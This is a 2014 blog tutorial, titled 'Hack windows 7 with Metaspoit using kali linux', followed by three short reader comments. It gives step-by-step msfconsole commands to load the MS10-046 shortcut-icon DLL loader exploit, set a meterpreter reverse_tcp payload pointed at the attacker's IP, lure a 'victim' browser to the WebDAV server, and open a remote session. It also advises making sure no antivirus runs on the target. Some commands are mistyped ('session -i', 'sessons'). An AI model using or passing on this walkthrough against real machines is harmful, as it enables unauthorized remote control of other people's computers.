Friday, 22 August 2014

Hack windows 7 with Metaspoit using kali linux



Exploiting a windows vulnerability to logging into the system without username and password using Metasploit.

Requirements:
1. MetaSploit Installed (Kali Linux Distribution)
2. Ruby Installed (Install all the package of Ruby to avoid any issues)
3. Two OS running either on same as virtual or physically different

Machine 1:  Host   Kali Linux Machine
Machine 2: Target Windows 7 Machine (32 bit).

To lounch metasploit, enter msfconsole at command line
#msfconsole



Now once you get the msf prompt type the below command  and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader.


Here above module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL.This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Now once we have found the desired module we will use this exploit by typing the below command
#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.

#msf > set payload windows/meterpreter/reverse_tcp


 
 Now its time to do some configuration for the exploit/payload that we have just set. Type the given command
#msf > show options
 

You should get below default output.

Now we have to set the local host to listen. Type the given below two commands.

#msf > set SRVHOST 192.168.73.128
This will be your HOST IP address running metasploit.

 #msf > set LHOST 192.168.73.128
This will be also your HOST IP address running metasploit.




Now check if the above applied configuration is applied.
#msf > show options



Now finally we will start to exploit. Run the command Exploit.
#msf > exploit


Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)
On any Client machine simply open Internet Explorer and try to open http://192.168.73.128:80/


Note: it will give you a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.
You can check the number of successful connected session by running the command sessons in msf console.
Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

#meterpeter > session -i 1

now you are connected to the remote system and can run a lots of script in meterpreter. for knowning the use of scripts check out  the "help" command in meterpreter.


enjoy your self   :)
 
Posted by at
Labels: , , ,

3 comments:

  1. Tanweer Ahsan11 April 2015 at 09:31

    Sir,
    what is the process to install kali linux in my laptop win 8.1

    ReplyDelete
  2. Unknown16 February 2021 at 01:18

    We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ReplyDelete
  3. Unknown29 April 2021 at 20:56

    Dafit

    ReplyDelete

Subscribe to: Post Comments (Atom)